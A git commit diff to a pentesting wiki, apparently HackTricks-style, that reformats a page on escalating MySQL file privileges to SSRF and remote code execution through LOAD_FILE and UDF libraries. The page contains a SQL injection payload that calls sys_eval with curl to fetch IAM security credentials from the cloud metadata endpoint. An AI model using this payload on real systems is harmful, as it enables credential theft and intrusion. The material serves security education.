GitBook: [#3584] No subject
This commit is contained in:
parent
5d7c86366f
commit
d8ffc8fffb
|
@ -521,7 +521,7 @@
|
|||
* [MS Access SQL Injection](pentesting-web/sql-injection/ms-access-sql-injection.md)
|
||||
* [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md)
|
||||
* [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
|
||||
* [Mysql File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
|
||||
* [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
|
||||
* [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
|
||||
* [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
|
||||
* [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo\_import-data-exfiltration.md)
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Mysql File priv to SSRF/RCE
|
||||
# MySQL File priv to SSRF/RCE
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -14,7 +14,7 @@
|
|||
|
||||
**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)
|
||||
|
||||
### Using LOAD\_FILE/LOAD DATA/LOAD XML
|
||||
### LOAD\_FILE/LOAD DATA/LOAD XML to SSRF
|
||||
|
||||
Every SQL Out of Band data exfiltration article will use the `LOAD_FILE()` string function to make a network request. The function itself has its own limitations based on the operating system it is run on and the settings with which the database was started.
|
||||
|
||||
|
@ -30,13 +30,13 @@ This Server Side Request Forgery, although useful, is restricted to only TCP por
|
|||
|
||||
![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/3.png)
|
||||
|
||||
### Using User Defined Functions
|
||||
### User Defined Functions to RCE
|
||||
|
||||
Another cool technique with MySQL databases is the ability to use User Defined Functions (UDF) present in external library files that if present in specific locations or system $PATH then can be accessed from within MySQL.
|
||||
|
||||
You could use a SQL Injection to write a library (`.so` or `.dll` depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
|
||||
You could use a SQL Injection to **write a library (`.so` or `.dll`** depending on Linux or Windows), containing a User Defined Function that can make network/HTTP requests, that can be then invoked through additional queries.
|
||||
|
||||
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the `plugin_dir` variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
|
||||
This has its own set of restrictions though. Based on the version of MySQL, which you can identify with `select @@version`, the directory where plugins can be loaded from is restricted. MySQL below `v5.0.67` allowed for library files to be loaded from system path if the `plugin_dir` variable was not set. This has changed now and newer versions have the **`plugin_dir`** variable set to something like `/usr/lib/mysql/plugin/`, which is usually owned by root.
|
||||
|
||||
Basically **for you to load a custom library into MySQL and call a function from the loaded library via SQL Injection, you would need**:
|
||||
|
||||
|
@ -44,7 +44,7 @@ Basically **for you to load a custom library into MySQL and call a function from
|
|||
* **`file_priv`** set to **`Y`** in `mysql.user` for the current database user
|
||||
* **`secure_file_priv`** set to **`""`** so that you can read the raw bytes of the library from an arbitrary location like the network or a file uploads directory in a web application.
|
||||
|
||||
Assuming the above conditions are met, you can use the classical approach of transferring the [popular MySQL UDF `lib_mysqludf_sys` library](https://github.com/mysqludf/lib\_mysqludf\_sys) to the database server. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
|
||||
Assuming the above conditions are met, you can use the **classical approach of transferring the** [**popular MySQL UDF `lib_mysqludf_sys` library**](https://github.com/mysqludf/lib\_mysqludf\_sys) **to the database server**. You would then be able to make operating system command requests like `cURL` or `powershell wget` to perform SSRF using the syntax
|
||||
|
||||
`x'; SELECT sys_eval('curl http://169.254.169.254/latest/meta-data/iam/security-credentials/'); -- //`
|
||||
|
||||
|
|
Loading…
Reference in New Issue